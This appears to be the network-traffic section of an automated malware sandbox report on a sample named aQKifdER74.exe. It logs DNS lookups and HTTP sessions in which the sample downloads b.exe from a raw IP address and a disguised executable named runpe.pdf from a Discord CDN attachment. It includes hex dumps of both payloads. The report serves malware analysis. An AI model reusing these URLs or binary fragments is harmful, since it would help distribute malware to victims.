                                        Sep 27, 2021 20:37:39.179313898 CEST5653453192.168.2.48.8.8.8
                                        Sep 27, 2021 20:37:39.192168951 CEST53565348.8.8.8192.168.2.4
                                        Sep 27, 2021 20:37:39.790115118 CEST5662753192.168.2.48.8.8.8
                                        Sep 27, 2021 20:37:39.803355932 CEST53566278.8.8.8192.168.2.4
                                        Sep 27, 2021 20:37:40.341769934 CEST5662153192.168.2.48.8.8.8
                                        Sep 27, 2021 20:37:40.354737997 CEST53566218.8.8.8192.168.2.4
                                        Sep 27, 2021 20:37:41.237998962 CEST6311653192.168.2.48.8.8.8
                                        Sep 27, 2021 20:37:41.252170086 CEST53631168.8.8.8192.168.2.4
                                        Sep 27, 2021 20:37:42.693799973 CEST6407853192.168.2.48.8.8.8
                                        Sep 27, 2021 20:37:42.707974911 CEST53640788.8.8.8192.168.2.4
                                        Sep 27, 2021 20:37:43.310050011 CEST6480153192.168.2.48.8.8.8
                                        Sep 27, 2021 20:37:43.323051929 CEST53648018.8.8.8192.168.2.4
                                        Sep 27, 2021 20:37:52.002207994 CEST6172153192.168.2.48.8.8.8
                                        Sep 27, 2021 20:37:52.037498951 CEST53617218.8.8.8192.168.2.4
                                        Sep 27, 2021 20:37:52.203219891 CEST5125553192.168.2.48.8.8.8
                                        Sep 27, 2021 20:37:52.216603994 CEST53512558.8.8.8192.168.2.4
                                        Sep 27, 2021 20:38:25.503169060 CEST6152253192.168.2.48.8.8.8
                                        Sep 27, 2021 20:38:25.537821054 CEST53615228.8.8.8192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Sep 27, 2021 20:36:18.031347036 CEST192.168.2.48.8.8.80x6430Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Sep 27, 2021 20:36:18.044917107 CEST8.8.8.8192.168.2.40x6430No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                        Sep 27, 2021 20:36:18.044917107 CEST8.8.8.8192.168.2.40x6430No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                        Sep 27, 2021 20:36:18.044917107 CEST8.8.8.8192.168.2.40x6430No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                        Sep 27, 2021 20:36:18.044917107 CEST8.8.8.8192.168.2.40x6430No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                        Sep 27, 2021 20:36:18.044917107 CEST8.8.8.8192.168.2.40x6430No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • cdn.discordapp.com
                                        • 5.230.68.154

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.449773162.159.133.233443C:\Users\user\Desktop\aQKifdER74.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.4497725.230.68.15480C:\Users\user\Desktop\aQKifdER74.exe
                                        TimestampkBytes transferredDirectionData
                                        Sep 27, 2021 20:36:17.794027090 CEST1122OUTGET /img/icon/b.exe HTTP/1.1
                                        Host: 5.230.68.154
                                        Connection: Keep-Alive
                                        Sep 27, 2021 20:36:17.822236061 CEST1123INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Mon, 27 Sep 2021 18:36:17 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 46080
                                        Connection: keep-alive
                                        Keep-Alive: timeout=60
                                        Last-Modified: Thu, 23 Sep 2021 16:06:22 GMT
                                        ETag: "b400-5ccabcfe1ddf5"
                                        Accept-Ranges: bytes
                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 23 90 b7 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 a8 00 00 00 0a 00 00 00 00 00 00 6e c7 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 c7 00 00 57 00 00 00 00 e0 00 00 ff 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 a7 00 00 00 20 00 00 00 a8 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ff 07 00 00 00 e0 00 00 00 08 00 00 00 aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 c7 00 00 00 00 00 00 48 00 00 00 02 00 05 00 fc 59 00 00 18 6d 00 00 03 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf eb 1e 56 fb cd 97 3b b2 19 02 24 30 a5 78 43 00 3d 56 44 d2 1e 62 b9 d4 f1 80 e7 e6 c3 39 41 2e 00 2f 00 5c 00 00 00 1e 02 28 18 00 00 0a 2a 1a 7e 13 00 00 04 2a 1e 02 80 13 00 00 04 2a 1a 7e 14 00 00 04 2a 1e 02 80 14 00 00 04 2a 1a 7e 15 00 00 04 2a 1e 02 80 15 00 00 04 2a 1a 7e 16 00 00 04 2a 1e 02 80 16 00 00 04 2a 1a 7e 17 00 00 04 2a 1e 02 80 17 00 00 04 2a 1a 7e 18 00 00 04 2a 1e 02 80 18 00 00 04 2a 1a 7e 19 00 00 04 2a 1e 02 80 19 00 00 04 2a 1a 7e 1a 00 00 04 2a 1a 7e 1b 00 00 04 2a 1e 02 80 1b 00 00 04 2a 1a 7e 1c 00 00 04 2a 1e 02 80 1c 00 00 04 2a 1a 7e 1d 00 00 04 2a 1e 02 80 1d 00 00 04 2a 2a 02 28 3e 00 00 0a 16 fe 03 2a 32 7e 0b 00 00 04 03 6f 3f 00 00 0a 2a 2e 73 18 00 00 0a 80 1a 00 00 04 2a e6 28 29 00 00 06 3a 28 00 00 00 28 2a 00 00 06 3a 1e 00 00 00 28 2b 00 00 06 3a 14 00 00 00 28 27 00 00 06 3a 0a 00 00 00 28 28 00 00 06 39 06 00 00 00 14 28 76 00 00 0a 2a 56 28 9c 00 00 0a 73 9d 00 00 0a 20 20 02 00 00 6f 9e 00 00 0a 2a 6e 7e 1e 00 00 04 39 10 00 00 00 7e 1e 00 00 04 6f ad 00 00 0a 14 80 1e 00 00 04 2a 7e 7e 0f 00 00 04 28 17 00 00 0a 39 0f 00 00 00 28 30 00 00 06 39 05 00 00 00 28 40 00 00 06 2a 56 72 ae 25 00 70 7e 10 00 00 04 28 6f 00 00 0a 80 23 00 00 04 2a be 73 94 00 00 06 25 72 62 21 00 70 6f 7f 00 00 06 72 5a 26 00 70 6f 8c 00 00 06 6f 89 00 00 06 28 20 00 00 06 20 e8 03 00 00 28 14 00 00 0a 2a da 73 94 00 00 06 25 72 62 21 00 70 6f 7f 00 00 06
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL#^n @ @W H.textt `.rsrc@@.reloc@BPHYmV;$0xC=VDb9A./\(*~**~**~**~**~**~**~**~*~**~**~***(>*2~o?*.s*():((*:(+:(':((9(v*V(s o*n~9~o*~~(9(09(@*Vr%p~(o#*s%rb!porZ&poo( (*s%rb!po
                                        Sep 27, 2021 20:36:17.822273970 CEST1125INData Raw: 72 6c 26 00 70 6f 8c 00 00 06 25 72 6c 26 00 70 6f 7f 00 00 06 02 6f 8c 00 00 06 6f 89 00 00 06 28 20 00 00 06 2a 2e 73 c9 00 00 0a 80 24 00 00 04 2a 5e 02 28 19 00 00 0a 03 6f 1f 00 00 0a 28 4d 00 00 06 28 ce 00 00 0a 2a 5e 28 19 00 00 0a 02 03
                                        Data Ascii: rl&po%rl&pooo( *.s$*^(o(M(*^(((Oo*b D%-(,*2~.o*2~.o*2((X*D%%c%c%c*ND%%c*2((X*.s.*
                                        Sep 27, 2021 20:36:17.822293997 CEST1126INData Raw: 6f 4e 00 00 06 80 03 00 00 04 7e 0d 00 00 04 7e 04 00 00 04 6f 4e 00 00 06 80 04 00 00 04 7e 0d 00 00 04 7e 08 00 00 04 6f 4e 00 00 06 80 08 00 00 04 7e 0d 00 00 04 7e 0e 00 00 04 6f 4e 00 00 06 80 0e 00 00 04 7e 0d 00 00 04 7e 0c 00 00 04 6f 4e
                                        Data Ascii: oN~~oN~~oN~~oN~~oN~~oN~~oN(-~~oN~~oN(s(&*A##
                                        Sep 27, 2021 20:36:17.822319031 CEST1128INData Raw: 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 02 00 00 e4 02 00 00 0c 00 00 00 01 00 00 01 1b 30 02 00 6a 00 00 00 00 00 00 00 28 08 00 00 06 25 3a 06 00 00 00 26 38 05 00 00 00 28 40 00 00 0a 28 06 00 00 06 25 3a 06 00 00 00 26 38 05 00 00
                                        Data Ascii: 0j(%:&8(@(%:&8(A(%:&8(B(%:&8(B&(*]]0(o+9(:((oC>k(jX
                                        Sep 27, 2021 20:36:17.822343111 CEST1129INData Raw: 25 17 06 6f 5e 00 00 0a 28 5f 00 00 0a a2 25 18 72 fc 21 00 70 a2 25 19 06 6f 58 00 00 0a a2 25 1a 72 0e 22 00 70 a2 28 60 00 00 0a 6f 61 00 00 0a 11 05 17 6f 62 00 00 0a 11 05 17 6f 63 00 00 0a 11 05 28 64 00 00 0a 26 38 52 00 00 00 7e 65 00 00
                                        Data Ascii: %o^(_%r!p%oX%r"p(`oaoboc(d&8R~er""p(fogo^(_r"poXr"p(hoi9o3oX(j9oX(k (oXsl(mioL(1(nr"
                                        Sep 27, 2021 20:36:17.822366953 CEST1130INData Raw: 0a 06 6f 8f 00 00 0a 0a 73 90 00 00 0a 0b 06 0c 16 0d 38 1c 00 00 00 08 09 91 13 04 07 12 04 72 f8 23 00 70 28 91 00 00 0a 6f 92 00 00 0a 26 09 17 58 0d 09 08 8e 69 32 de 07 6f 38 00 00 0a 16 1f 14 6f 93 00 00 0a 6f 94 00 00 0a 2a 00 00 00 13 30
                                        Data Ascii: os8r#p(o&Xi2o8oo*0s%rb!por#po%r$po~o%r$po(o8o%r($pos{(|o8r.$porB$p((rF$prP$por\$prh$
                                        Sep 27, 2021 20:36:17.822390079 CEST1132INData Raw: 00 00 02 00 11 00 10 21 00 0d 00 00 00 00 00 00 00 00 2e 2e 00 0f 31 00 00 01 1b 30 02 00 42 00 00 00 12 00 00 11 7e 65 00 00 0a 7e 23 00 00 04 6f b4 00 00 0a 0a 06 02 6f b5 00 00 0a 74 02 00 00 1b 0b dd 1e 00 00 00 06 39 06 00 00 00 06 6f 33 00
                                        Data Ascii: !..10B~e~#oot9o3o(I**"//10>~e~#oo9o3o(I**++10C
                                        Sep 27, 2021 20:36:17.822415113 CEST1133INData Raw: 03 3a 0b 00 00 00 72 c0 26 00 70 73 cf 00 00 0a 7a 73 d0 00 00 0a 0a 06 1f 20 6a 6f 4e 00 00 0a 73 d1 00 00 0a 0b 07 20 00 01 00 00 6f d2 00 00 0a 07 20 80 00 00 00 6f d3 00 00 0a 07 17 6f d4 00 00 0a 07 18 6f d5 00 00 0a 07 02 7b 2a 00 00 04 6f
                                        Data Ascii: :r&pszs joNs o ooo{*ooosooioLioLo{+so oi YojoNioL'9o39o39o
                                        Sep 27, 2021 20:36:17.822441101 CEST1134INData Raw: 2a 00 1b 30 02 00 60 00 00 00 1e 00 00 11 15 0a 15 0b 03 6f 7d 00 00 0a 0c 02 7b 38 00 00 04 6f bb 00 00 0a 0d 38 26 00 00 00 12 03 28 bc 00 00 0a 13 04 06 17 58 0a 08 11 04 7b 34 00 00 04 6f ed 00 00 0a 39 07 00 00 00 06 0b dd 1c 00 00 00 12 03
                                        Data Ascii: *0`o}{8o8&(X{4o9(-o3*9P0(m@*{8o*0{8o= Xo8Y =*
                                        Sep 27, 2021 20:36:17.822474003 CEST1136INData Raw: 00 1b 16 02 7b 35 00 00 04 74 02 00 00 1b 8e 69 6f 4c 00 00 0a 25 6f 9f 00 00 0a 6f 40 00 00 0a 17 2a 16 2a 13 30 04 00 af 00 00 00 23 00 00 11 02 0a 03 6f f1 00 00 0a 19 8d 39 00 00 01 25 d0 47 00 00 04 28 e4 00 00 0a 6f 26 00 00 0a 0b 14 0c 07
                                        Data Ascii: {5tioL%oo@**0#o9%G(o&:*i>A828on:oooj8XiY2iY8om>{8o*oooj*0;$s
                                        Sep 27, 2021 20:36:17.856134892 CEST1137INData Raw: 0d 38 10 00 00 00 02 28 6c 00 00 06 03 6f 88 00 00 06 09 17 58 0d 09 08 32 ec 2a 06 20 d9 00 00 00 40 0e 00 00 00 02 06 03 28 97 00 00 06 28 81 00 00 06 2a 06 20 de 00 00 00 40 55 00 00 00 18 8d 44 00 00 01 0b 03 07 16 18 6f 45 00 00 0a 26 07 28
                                        Data Ascii: 8(loX2* @((* @UDoE&(X((k}68(l%(ojoX2* @UDoE&(X((k}68(l%(ojoX2


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.449773162.159.133.233443C:\Users\user\Desktop\aQKifdER74.exe
                                        TimestampkBytes transferredDirectionData
                                        2021-09-27 18:36:18 UTC0OUTGET /attachments/889935662827044904/889981640498090054/runpe.pdf HTTP/1.1
                                        Host: cdn.discordapp.com
                                        Connection: Keep-Alive
                                        2021-09-27 18:36:18 UTC0INHTTP/1.1 200 OK
                                        Date: Mon, 27 Sep 2021 18:36:18 GMT
                                        Content-Type: application/pdf
                                        Content-Length: 413184
                                        Connection: close
                                        CF-Ray: 6956d637a840d608-MXP
                                        Accept-Ranges: bytes
                                        Cache-Control: public, max-age=31536000
                                        Content-Disposition: attachment;%20filename=runpe.pdf
                                        ETag: "27a5260c3d72986f4e22a50865143075"
                                        Expires: Tue, 27 Sep 2022 18:36:18 GMT
                                        Last-Modified: Tue, 21 Sep 2021 21:09:18 GMT
                                        Vary: Accept-Encoding
                                        CF-Cache-Status: MISS
                                        Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                        x-goog-generation: 1632258558207603
                                        x-goog-hash: crc32c=9NZa8w==
                                        x-goog-hash: md5=J6UmDD1ymG9OIqUIZRQwdQ==
                                        x-goog-metageneration: 1
                                        x-goog-storage-class: STANDARD
                                        x-goog-stored-content-encoding: identity
                                        x-goog-stored-content-length: 413184
                                        X-GUploader-UploadID: ADPycdsYKC4VXPddSs6Xe9g82lz1ZZoaMSD06VGl4YB2U5Zg15mTRs5gz8PwNghFMAjCzZt_USTanQR0j1AeRVknD4ATQAO2kQ
                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=a1FR89tV%2BOtxrrMUfX6OW4ba460TVcF22DTnkx45%2F1VuwdW4y5oTxbLKaT%2BSul9V7rMYIXyGMe6w2To0X%2BHpzkKJUZnXZ9V5Led5RFyIUpDopsNOoQT43XFVPFWX3knk3K1n2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        2021-09-27 18:36:18 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                        Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                        2021-09-27 18:36:18 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 07 1e 2b 61 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 0b 00 00 1c 06 00 00 30 00 00 00 00 00 00 8e 3b 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 06 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL+a!0; @@ `
                                        2021-09-27 18:36:18 UTC2INData Raw: 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 16 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 85 00 00 00 01 00 00 11 28 1e 05 00 06 20 03 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 58 00 00 00 05 00 00 00 1f 00 00 00 3e 00 00 00 38 53 00 00 00 28 31 06 00 06 20 00 00 00 00 7e 52 01 00 04 3a d2 ff ff ff 26 38 c8 ff ff ff 28 26 00 00 06 20 01 00 00 00 7e 4f 01 00 04 3a b8 ff ff ff 26 20 00 00 00 00 38 ad ff
                                        Data Ascii: ***0*0*0*0*0*0*0*0( 8EX>8S(1 ~R:&8(& ~O:& 8
                                        2021-09-27 18:36:18 UTC4INData Raw: 00 7e 37 01 00 04 3a 56 ff ff ff 26 38 4c ff ff ff 11 01 1f 09 1f 72 9c 20 0d 00 00 00 38 3f ff ff ff 11 01 18 1f 61 9c 20 0c 00 00 00 7e 25 01 00 04 39 2a ff ff ff 26 38 20 ff ff ff 11 01 1b 1f 69 9c 20 03 00 00 00 7e 65 01 00 04 3a 0f ff ff ff 26 20 1a 00 00 00 38 04 ff ff ff 11 01 16 1f 6b 9c 20 01 00 00 00 7e 13 01 00 04 3a ef fe ff ff 26 38 e5 fe ff ff 28 4f 00 00 06 20 0e 00 00 00 fe 0e 00 00 38 d2 fe ff ff 1e 8d 2d 00 00 01 13 01 20 1c 00 00 00 38 c4 fe ff ff 00 2a 11 01 1f 0b 1f 41 9c 20 1b 00 00 00 38 b1 fe ff ff 11 01 1c 1f 62 9c 20 1d 00 00 00 fe 0e 00 00 38 99 fe ff ff 11 01 17 1f 65 9c 20 05 00 00 00 fe 0e 00 00 38 85 fe ff ff 11 01 1f 0a 1f 79 9c 20 13 00 00 00 38 78 fe ff ff 11 01 1c 1f 33 9c 20 02 00 00 00 7e 28 01 00 04 39 63 fe ff ff 26
                                        Data Ascii: ~7:V&8Lr 8?a ~%9*&8 i ~e:& 8k ~:&8(O 8- 8*A 8b 8e 8y 8x3 ~(9c&
                                        2021-09-27 18:36:18 UTC5INData Raw: 00 04 39 a9 ff ff ff 26 38 9f ff ff ff 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 b0 00 00 00 01 00 00 11 28 1e 05 00 06 20 03 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 06 00 00 00 4d 00 00 00 5e 00 00 00 05 00 00 00 6d 00 00 00 4f 00 00 00 1f 00 00 00 38 48 00 00 00 28 a2 00 00 06 20 01 00 00 00 7e 4b 01 00 04 3a ca ff ff ff 26 38 c0 ff ff ff 73 9f 00 00 06 7e af 01 00 04 28 15 07 00 06 74 18 00 00 02 80 24 00 00 04 20 00 00 00 00 7e 5b 01 00 04 39 9c ff ff ff 26 38 92 ff ff ff 00 2a 28 a4 00 00 06 20 05 00 00 00 38 85 ff ff ff 28 a3 00 00 06 20 04 00 00 00 38 76 ff ff ff 28 a1 00 00 06 20 02 00 00 00 38 67 ff ff ff 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30
                                        Data Ascii: 9&8*****0( 8EM^mO8H( ~K:&8s~(t$ ~[9&8*( 8( 8v( 8g0*0
                                        2021-09-27 18:36:18 UTC6INData Raw: 00 00 00 2a 13 30 03 00 74 00 00 00 01 00 00 11 28 1e 05 00 06 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 1c 00 00 00 05 00 00 00 32 00 00 00 1b 00 00 00 38 17 00 00 00 28 16 05 00 06 20 00 00 00 00 17 3a d6 ff ff ff 26 38 cc ff ff ff 2a 28 36 01 00 06 20 03 00 00 00 17 3a bf ff ff ff 26 38 b5 ff ff ff 28 35 01 00 06 20 01 00 00 00 17 3a a9 ff ff ff 26 38 9f ff ff ff 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03
                                        Data Ascii: *0t( 8E28( :&8*(6 :&8(5 :&8******0*0*0*0**0
                                        2021-09-27 18:36:18 UTC8INData Raw: 00 00 00 4c 00 00 00 05 00 00 00 36 00 00 00 20 00 00 00 38 47 00 00 00 28 cd 01 00 06 20 00 00 00 00 16 39 d6 ff ff ff 26 20 00 00 00 00 38 cb ff ff ff 28 cc 01 00 06 20 02 00 00 00 16 39 bb ff ff ff 26 38 b1 ff ff ff 28 98 01 00 06 20 01 00 00 00 16 39 a5 ff ff ff 26 38 9b ff ff ff 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14
                                        Data Ascii: L6 8G( 9& 8( 9&8( 9&8********************
                                        2021-09-27 18:36:18 UTC9INData Raw: 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04
                                        Data Ascii: *0*0**0*0*0*0*0***0*0*0*0*0*0*0*0
                                        2021-09-27 18:36:18 UTC10INData Raw: 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30
                                        Data Ascii: *0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0
                                        2021-09-27 18:36:18 UTC12INData Raw: 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00
                                        Data Ascii: *****************************0*0
                                        2021-09-27 18:36:18 UTC13INData Raw: 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 76 00 00 00 01 00 00 11 28 1e 05 00 06 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 36 00 00 00 37 00 00 00 05 00 00 00 1b 00 00 00 38 31 00 00 00 28 68 03 00 06 20 01 00 00 00 16 39 d6 ff ff ff 26 38 cc ff ff ff 28 69 03 00 06 20 00 00 00 00 17 39 c0 ff ff ff 26 20 00 00 00 00 38 b5 ff ff ff 2a 28 64 03 00 06 20 03 00 00 00 fe 0e 00 00 38 9d ff ff ff 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 05 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 77 00 00 00 01 00 00 11 28 1e 05 00 06 20 02 00 00 00 fe 0e
                                        Data Ascii: *0*0v( 8E6781(h 9&8(i 9& 8*(d 8******0*0*0w(
